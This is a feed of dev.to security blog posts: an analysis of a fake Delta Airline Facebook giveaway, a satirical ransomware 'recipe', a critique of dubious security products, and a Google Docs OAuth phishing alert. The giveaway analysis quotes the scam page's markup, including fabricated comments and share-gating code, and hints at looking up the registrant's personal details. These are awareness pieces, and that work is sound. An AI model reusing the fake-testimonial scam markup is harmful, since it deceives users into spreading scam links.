    &amp;lt;p class="comtxt"&amp;gt;&amp;lt;span class="name"&amp;gt;Radford Sarah&amp;lt;/span&amp;gt; Wow, i won a free tickets from Delta Airline. &amp;lt;/p&amp;gt;
    &amp;lt;p class="combot"&amp;gt;&amp;lt;span class="ago"&amp;gt;Just Now&amp;lt;/span&amp;gt; Â· &amp;lt;span class="fblike"&amp;gt;Like&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;div class="item"&amp;gt;
    &amp;lt;img class="profileimg" src="https://randomuser.me/api/portraits/women/46.jpg" /&amp;gt;
    &amp;lt;p class="comtxt"&amp;gt;&amp;lt;span class="name"&amp;gt;Deleon Sandra&amp;lt;/span&amp;gt; Such a Great Service! Thanks Delta Airline.&amp;lt;/p&amp;gt;
    &amp;lt;p class="combot"&amp;gt;&amp;lt;span class="ago"&amp;gt;11 minutes ago&amp;lt;/span&amp;gt; Â· &amp;lt;span class="fblike"&amp;gt;Like&amp;lt;/span&amp;gt;&amp;lt;span class="likes totlikes"&amp;gt;267&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;div class="item"&amp;gt;
    &amp;lt;img class="profileimg" src="https://randomuser.me/api/portraits/women/89.jpg" /&amp;gt;
    &amp;lt;p class="comtxt"&amp;gt;&amp;lt;span class="name"&amp;gt;Brenda Vaughn&amp;lt;/span&amp;gt; I am finally going  to France with my friends.. Thanks Delta Airline!&amp;lt;/p&amp;gt;
    &amp;lt;p class="combot"&amp;gt;&amp;lt;span class="ago"&amp;gt;17 minutes ago&amp;lt;/span&amp;gt; Â· &amp;lt;span class="fblike"&amp;gt;Like&amp;lt;/span&amp;gt;&amp;lt;span class="likes totlikes"&amp;gt;63&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/div&amp;gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For an extra treat, the page had some JavaScript that made a new comment appear periodically, to make it look like the Facebook comments were being actively updated and added by other users. It also let the user add their own comment and faded it into the comment list, even though there was no indication that the comments were persisted anywhere. &lt;/p&gt;

&lt;p&gt;The more interesting part about this is that the site never asked for any information from me and, based on the source code, I don't think it was ever going to. Based on the code below, it seems as though the host just wants you to share the link. It doesn't have a way to verify that you actually did it, and there aren't any conditional statements to advance the user to another section. No matter what the user did, they would always get a pop-up telling them to complete Step 1 when they tried to progress to Step 2. If getting personal information from the user isn't the objective here, then this site isn't a phishing site. It's more than likely used to deliver malware.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;div id="final"&amp;gt;
    &amp;lt;p align="center" class="prodname"&amp;gt;Step 1&amp;lt;/p&amp;gt;
    &amp;lt;p align="center" class="prodname"&amp;gt;Share this page by clicking "SHARE" button and type "Thanks #Delta Airline!" in the comments field!&amp;lt;/p&amp;gt;
    &amp;lt;p align="center"&amp;gt;
        &amp;lt;a id="go" href="javascript:void(0)" onClick="gt=window.open('https://www.facebook.com/sharer/sharer.php?u=' + link + '', 'gt','top=176,left=500,toolbar=no,location=yes,directories=no,status=no, menubar=no,scrollbars=no,resizable=no,width=800,height=50'); gt.onload = function () {gt.focus();}; return false;"&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;img src="http://i.imgur.com/xzmclDm.png" align="top" border="0"&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/a&amp;gt;
    &amp;lt;/p&amp;gt;
    &amp;lt;div class="cont clearfix"&amp;gt;
        &amp;lt;/br&amp;gt;
        &amp;lt;/br&amp;gt;
        &amp;lt;p align="center" class="prodname"&amp;gt;Step 2&amp;lt;/p&amp;gt;
        &amp;lt;div align="center"&amp;gt;
            &amp;lt;p align="center" class="prodname"&amp;gt;Click Like&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
            &amp;lt;a id="to" href='javascript:window.alert("Complete Step 1 to get the Coupon!");'&amp;gt; &amp;lt;br/&amp;gt;&amp;lt;img src="http://i.imgur.com/7FesHcD.jpg"&amp;gt; &amp;lt;/a&amp;gt;
            &amp;lt;div class="loading-wrap"&amp;gt;
                &amp;lt;p align="center" class="prodname"&amp;gt;Verifying steps &amp;lt;/p&amp;gt;
                &amp;lt;img src="http://i.imgur.com/x557web.gif" height="75" alt="Loader image not found"&amp;gt;
            &amp;lt;/div&amp;gt;
        &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I also went back through the site with Google Chrome's inspection tool to watch network traffic and found that the site was pulling information about my browser and operating system, as well as information about my mouse movements. The site also collected information about my geographic location. All of this seems to be in line with my theory about the site delivering malware. Collecting information about browser version and operating system could be used to determine whether or not the user's machine is vulnerable, and code on the backend could be making a decision about whether or not to deliver the malware. &lt;/p&gt;

&lt;p&gt;I ran the host through a malware scanner called VxStream (hosted on Hybrid-Analysis.com) and found that if the user is running Internet Explorer the website actually does something more interesting. It launched another instance of Internet Explorer and read through a bunch of registry settings, including security settings for the system. It requested access to the rasman service, which is used to establish remote connections, and dropped a few files. It does look like it was preparing to install something if the user was running that operating system and browser, but I can't be entirely sure. The analysis ran in a sandbox, and that isn't always reliable if the malware uses evasion tactics. &lt;/p&gt;

&lt;h1&gt;
  
  
  Conclusion
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;Server IP: 104.18.58.70&lt;/li&gt;
&lt;li&gt;Hosted by: Cloudflare&lt;/li&gt;
&lt;li&gt;Web server: nginx&lt;/li&gt;
&lt;li&gt;Domain: Deltaa-com.us&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I did a WHOIS lookup on the domain and found out that our registrant didn't bother to obscure his personal information.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fkncxi8pm3friopewl6zi.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2Fkncxi8pm3friopewl6zi.jpg"&gt;&lt;/a&gt;&lt;br&gt;
I blacked out his phone number, mailing address, and email address, but...you know...it's public information so if you want to find it... that's not my business.&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F159u0vyousxl3udzat06.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fthepracticaldev.s3.amazonaws.com%2Fi%2F159u0vyousxl3udzat06.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For this investigation, my results are inconclusive. I'm fairly confident that this site does distribute malware, but I cannot say what kind or what it does other than establishing a connection to a remote host (possibly a botnet?). VirusTotal now has 2 URL scanners that have identified this host as malicious (when I first checked it didn't have any hits). &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.virustotal.com/en/url/97553c0d99127df64d5fa948df91f7ece116264e7cf10dbc8619c7021899bb2c/analysis/1496672894/" rel="noopener noreferrer"&gt;virustotal.com/en/url/97553c0...&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It has also now been blacklisted on Sucuri's Sitecheck. &lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://sitecheck.sucuri.net/results/deltaa-com.us" rel="noopener noreferrer"&gt;sitecheck.sucuri.net/results/deltaa-com.us&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I assume it's only a matter of time now before Cloudflare shuts down the host, but it will probably pop up again somewhere else with a different IP address and/or hostname. This is the game of Whack-A-Mole that happens all of the time with these types of sites. &lt;/p&gt;

&lt;p&gt;Have you guys seen any particularly nasty scams on Facebook? What was the most outrageous claim?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Update 06/12&lt;/strong&gt; This host is a known affiliate link site. The user makes money when others share their link. Harmless to the user. &lt;/p&gt;

</description>
      <category>security</category>
      <category>facebookscams</category>
    </item>
    <item>
      <title>Can you name a female equivalent to Mark Zuckerberg, Steve Jobs, or Bill Gates?</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Fri, 19 May 2017 02:47:51 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/can-you-name-a-female-equivalent-to-mark-zuckerberg-steve-jobs-or-bill-gates</link>
      <guid>https://dev.to/antoinette0x53/can-you-name-a-female-equivalent-to-mark-zuckerberg-steve-jobs-or-bill-gates</guid>
      <description>&lt;p&gt;This question came up while I was doing some reading for a presentation I had to give at work about the gender gap in tech. I was hard-pressed to answer this question off the top of my head, though I'm sure if I employed a little bit of Google-fu I could dig up a few. For example, one of the cofounders of Cisco was a woman (I can't say how technical she was). So, can you name a woman who would be in the same league as tech founders like Mark, Steve, or Bill?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Sheryl Sandberg doesn't count. The Yahoo CEO doesn't count. Let it be known that I am aware that Steve Wozniak was actually the technical mind behind Apple, but I say Steve Jobs because of the social relevance of his name in this particular instance. &lt;/p&gt;

&lt;p&gt;Here is my entry. The founder of LMG Security is a woman named &lt;a href="http://www.techtarget.com/contributor/Sherri-Davidoff"&gt;Sherri Davidoff&lt;/a&gt;. Author of a couple of technical books. Over a decade of experience in information security. Highly technical. &lt;/p&gt;

</description>
      <category>discuss</category>
    </item>
    <item>
      <title>Recipe for Infection: Ransomware</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Tue, 16 May 2017 18:33:17 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/recipe-for-infection-ransomware</link>
      <guid>https://dev.to/antoinette0x53/recipe-for-infection-ransomware</guid>
      <description>&lt;p&gt;&lt;strong&gt;Cooking Time:&lt;/strong&gt; On average &amp;lt; 1 minute | &lt;strong&gt;Serving Size:&lt;/strong&gt; Thousands&lt;/p&gt;

&lt;h3&gt;
  
  
  Ingredients:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;1 highly motivated malicious actor&lt;/li&gt;
&lt;li&gt;At least 1 ransomware program with a strong encryption algorithm&lt;/li&gt;
&lt;li&gt;1 Tor Client (optional)&lt;/li&gt;
&lt;li&gt;1 malicious email (can be substituted with a compromised website or malicious download)&lt;/li&gt;
&lt;li&gt;1 vulnerable computer&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Directions
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;On the vulnerable computer, open the malicious email you've received and click the link or download the attachment. If there's a link or anything to click in the attachment, click it. This will trigger the download of the ransomware program (or the Tor client). &lt;strong&gt;Note: This email could come from a perfect stranger or someone you know.&lt;/strong&gt; &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;(Optional)&lt;/strong&gt; Once the Tor client is downloaded, let it connect to a malicious domain to download the ransomware program.  &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Once the ransomware program is downloaded, run it and set aside for about 30 seconds to 17 minutes, depending on the ransomware and the number of files on the vulnerable machine. The ransomware will copy itself to memory to continue running and delete the originally downloaded file. It will then parse through all of the files on the vulnerable computer (and any mapped network drives) and encrypt them using the strong encryption algorithm coupled with the program. &lt;strong&gt;Note: You'll want to be sure the encryption is strong, or else &lt;a href="https://blog.kaspersky.com/cryptxxx-v3-ransomware/13628/"&gt;a security research team might write a decryption algorithm and give it out for free to help people.&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Allow the ransomware to spread to share drives to infect and encrypt all other machines that might be connected to the vulnerable computer.   &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;After encryption is complete, open the instructions file dropped on the desktop of your vulnerable computer. This file will let you know how much to pay the highly motivated malicious actor and where to send the money (usually Bitcoin). &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Spend 10 minutes trying to open up your encrypted files only to see a bunch of garbled gibberish and then scream.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Spend 2 hours on the phone with tech support yelling about your files being gone and realize you don't have any data backups. &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Mix steps 6 and 7 together, blend until smooth. Follow up with a good cry in the fetal position.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Mull over paying the ~$500 ransom because you really want that photo of you and your late grandmother back.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;(Optional) Pay the ransom. &lt;strong&gt;Note: Take this step at your own risk. There is no guarantee that you'll get your files back&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;And voilà, you have a ransomware-infected machine. Quick and easy, and serves thousands. Perfect for causing millions to billions of dollars in data-loss damage for a large-scale enterprise or government organization. Many modifications to the recipe exist. Some like to deliver the ransomware program with a drive-by attack so that you (the user) don't have to actually click anything; you just have to visit an infected website. Other modifications include no real method to decrypt encrypted data, saving credentials and valuable information found in files on the computer, installing other malware on the machine (like a bot for a botnet), and running the ransomware as a service on the vulnerable machine. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Want to add a little extra?&lt;/strong&gt;&lt;br&gt;
Create some type of system to complete regular backups of your system that aren't continuously connected to the computer.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Suggested Drink Pairing&lt;/strong&gt;&lt;br&gt;
Vodka. Lots of Vodka. &lt;/p&gt;

</description>
      <category>security</category>
      <category>hacking</category>
      <category>ransomware</category>
      <category>vulnerabilities</category>
    </item>
    <item>
      <title>How Companies Prey On Your Ignorance of Tech and Your Fear of Hackers</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Fri, 05 May 2017 20:19:39 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/how-companies-prey-on-your-ignorance-of-tech-and-your-fear-of-hackers</link>
      <guid>https://dev.to/antoinette0x53/how-companies-prey-on-your-ignorance-of-tech-and-your-fear-of-hackers</guid>
      <description>&lt;h2&gt;
  
  
  "Everything Else Is Insecure"
&lt;/h2&gt;

&lt;p&gt;Meet Nomx.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F41b9oyke3zr8ksb7bmqd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F41b9oyke3zr8ksb7bmqd.png" alt="nomx" width="200" height="146"&gt;&lt;/a&gt;&lt;br&gt;
The "patent-pending nomx protocol provides secure, encrypted e-mail, messaging, audio and video communication services through a platform-agnostic protocol." This innovative protocol is delivered to you via a physical device that "allows users to transmit and receive secure communications using traditional email or messaging client." &lt;br&gt;
&lt;strong&gt;Nomx: Everything else is insecure&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffxmu4on01hmwaxagiquu.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffxmu4on01hmwaxagiquu.jpg" alt="shutupandtakemymoney" width="500" height="281"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Would you buy this product? Think it over...I'll wait. &lt;/p&gt;

&lt;p&gt;What if I told you that inside that Nomx box was a Raspberry Pi? Are you still impressed? Okay and then...what if I told you Nomx's special protocol was outdated versions of Postfix and Dovecot running on Raspbian? &lt;/p&gt;

&lt;p&gt;Are you beginning to understand where I'm headed now? If you guessed "Nomx is full of sh**", you guessed correctly. Scott Helme, a UK-based security researcher, was asked by the BBC to examine the Nomx device because a lot of people were getting pretty excited about it. The company was claiming that they were the most secure because Google and Yahoo had already been hacked, and they could guarantee that users' emails wouldn't be hacked. Scott Helme found that Nomx was largely underwhelming. I won't rehash it all here, but if you're interested &lt;a href="https://scotthelme.co.uk/nomx-the-worlds-most-secure-communications-protocol/" rel="noopener noreferrer"&gt;check out his write-up on his blog&lt;/a&gt;. &lt;/p&gt;

&lt;h2&gt;
  
  
  "SSL's that actually protect you are very expensive and have a long process"
&lt;/h2&gt;

&lt;p&gt;Next up: shortly after the ISP legislation, everyone began to seriously consider using VPNs for all of their browsing needs (except for Netflix). During that period of time, a company called MySafeVPN popped up to get in on the action. There were a few problems here. The first problem is that MySafeVPN presented itself as an affiliate of another company called Plex. Plex vehemently denied having any ties to MySafeVPN.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuj3pkv4mxdochqc46cqo.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuj3pkv4mxdochqc46cqo.PNG" alt="tweet" width="504" height="215"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Crazy? It gets crazier. MySafeVPN's billing site (which oddly took you to myvpnhub.com) was not secure. A lack of HTTPS on a VPN site doesn't inspire confidence. The quote above was their response when asked about the missing SSL certificates. Well, things went downhill from there. Turns out Plex had a data breach a few years ago that revealed email addresses, so that explains how Plex customers all received an email saying this new VPN service was associated with Plex. The whole ugly situation devolved into a Twitter battle between security researchers and MySafeVPN, a racial slur, and a sketchy phone call. &lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm0qwkeq0g20y3w9as42y.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm0qwkeq0g20y3w9as42y.PNG" alt="tweet" width="510" height="242"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://www.troyhunt.com/the-importance-of-trust-and-integrity-in-a-vpn-provider-and-how-mysafevpn-blew-it/" rel="noopener noreferrer"&gt;You can read about it on Troy Hunt's blog&lt;/a&gt;. MySafeVPN's Twitter account is now suspended (probably because of the racial slur or the lying and using stolen email addresses to promote their business, it's hard to tell).&lt;/p&gt;

&lt;h2&gt;
  
  
  Nothing is 100% Secure
&lt;/h2&gt;

&lt;p&gt;Companies, like Nomx and MySafeVPN, rely on the fact that you more than likely have no idea how encryption, networking, hacking, etc. works. They throw together a bunch of really technical terms that sound like they make sense and pray you can't tell the difference. ("Our billing site doesn't need SSL because we actually send that traffic back through our own VPN encrypted hyperloop tunnel" Did I do it right?). They feed on your fear that you can be hacked at any moment while telling you that you're powerless unless you buy their product. &lt;/p&gt;

&lt;p&gt;Don't be fooled by their claims. There are things you can do to avoid being tricked into buying mediocre security services:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Do your research on a product before you buy it. Chances are someone (probably a security researcher) has already reviewed it and written about it. &lt;/li&gt;
&lt;li&gt;Don't trust any company that says it wrote its own encryption algorithm. Seriously. Just don't. Ever. &lt;/li&gt;
&lt;li&gt;Be wary of any company claiming to be the &lt;strong&gt;World's Most Secure&lt;/strong&gt; anything. The truth is, 100% security is a myth, and anyone who tells you otherwise is playing you like a violin.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We have this saying in security, "It's not a matter of 'if', but 'when'" when we talk about a hack or a data breach. It happens to everyone, both companies and individuals, on differing scales and differing degrees of impact. In your personal life and at work, you are your best defense against a breach. Taking the time to inform yourself of a risk before taking action is the best way to protect yourself. &lt;/p&gt;

&lt;p&gt;Check out Matt Kiser's &lt;a href="https://dev.to/mattkiser/the-normal-persons-guide-to-internet-security"&gt;The Normal Person's Guide To Internet Security&lt;/a&gt; for tips.&lt;/p&gt;

</description>
      <category>security</category>
    </item>
    <item>
      <title>Don't Click That Google Docs Link: An Overview of The Google Docs Phish Going Around Today</title>
      <dc:creator>Antoinette Maria</dc:creator>
      <pubDate>Wed, 03 May 2017 21:28:19 +0000</pubDate>
      <link>https://dev.to/antoinette0x53/dont-click-that-google-docs-link---an-overview-of-the-google-docs-phish-going-around-today</link>
      <guid>https://dev.to/antoinette0x53/dont-click-that-google-docs-link---an-overview-of-the-google-docs-phish-going-around-today</guid>
      <description>&lt;p&gt;Just before 2 p.m. CST (-0500 GMT) today I received an email from an acquaintance of mine inviting me to view a document on Google Docs. I was immediately suspicious because the 'To' field of the address was a &lt;a href="https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=1&amp;amp;cad=rja&amp;amp;uact=8&amp;amp;ved=0ahUKEwjVtbXT0tTTAhVH6oMKHVQRAmAQFggmMAA&amp;amp;url=https%3A%2F%2Fmailinator.com%2F&amp;amp;usg=AFQjCNFpEVJAoJ2rRh9qRU3Mt7aDgmjYfw"&gt;Mailinator&lt;/a&gt; address, a throwaway email address. Red flag number one. Red flag number two is that I wasn't expecting any documents or emails from that person, and that's all I needed to know it was probably a phish. Others weren't so lucky. &lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;It should be noted that by this point if you Googled 'Mailinator' you also saw a bunch of tweets about the phishing campaign.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;It's old news in the world of security now, but for the past two hours or so someone (no one knows who yet) has been sending out a phishing email that looks exactly like the one I received. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--l4v7eA8z--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://thepracticaldev.s3.amazonaws.com/i/9t6s3gqo5en5gop57zm6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--l4v7eA8z--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://thepracticaldev.s3.amazonaws.com/i/9t6s3gqo5en5gop57zm6.png" alt="phishing email" width="800" height="530"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you clicked the link, you were taken to Google's account sign-in page to authenticate with OAuth. This page is legitimate. However, if you looked closely, you were actually granting access to an app called "Google Docs". Let's all pause here and ask ourselves, "Why would Google Docs need my permission to access anything?". It doesn't. The app is fake and was hosted on Cloudflare. It wasn't long before Cloudflare took the app down and Google revoked its access, so the phish is effectively dead now, but here are a few questions you might have.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What if I already allowed the access?&lt;/strong&gt; Well... the application now has access to all of your emails. It also sent a copy of the malicious email you received to everyone you've ever emailed. You should probably go ahead and revoke that access now, friend. &lt;a href="https://support.google.com/a/answer/2537800?hl=en#auth"&gt;Here's how&lt;/a&gt;.&lt;br&gt;
No word yet on what the attacker is doing with information found in mailboxes. Rumors are abundant though.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Would two factor authentication have helped?&lt;/strong&gt; Nah, sorry. 2FA wouldn't have played a role in this app gaining access since it is an OAuth phish. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Who else was affected?&lt;/strong&gt; I heard that a bunch of schools (K-12 and colleges) and government agencies were hit pretty hard. &lt;/p&gt;

&lt;p&gt;Here are a few articles for your reading pleasure if you need more info:&lt;br&gt;
&lt;a href="https://www.reddit.com/r/google/comments/692cr4/new_google_docs_phishing_scam_almost_undetectable/"&gt;New Google Docs phishing scam, almost undetectable - Reddit&lt;/a&gt;&lt;br&gt;
&lt;a href="https://www.reddit.com/r/sysadmin/comments/692cno/sudden_google_docs_spam/"&gt;Sudden Google Docs Spam? - Reddit&lt;/a&gt;&lt;br&gt;
&lt;a href="https://twitter.com/zachlatta/status/859843151757955072"&gt;A gif on Twitter of someone clicking on the link&lt;/a&gt;&lt;br&gt;
&lt;a href="https://motherboard.vice.com/en_us/article/massive-gmail-google-doc-phishing-email"&gt;Someone Hit the Internet with a Massive Google Doc Phishing Attack - Motherboard&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I hate to sound like the mandatory phishing training everyone at every company has to take but, seriously, &lt;strong&gt;think before you click&lt;/strong&gt;. I know this one looked really convincing, but there's nothing wrong with being suspicious of emails you weren't expecting to get (even if the person who sent them is someone you know). &lt;/p&gt;

</description>
      <category>security</category>
    </item>
  </channel>
</rss>
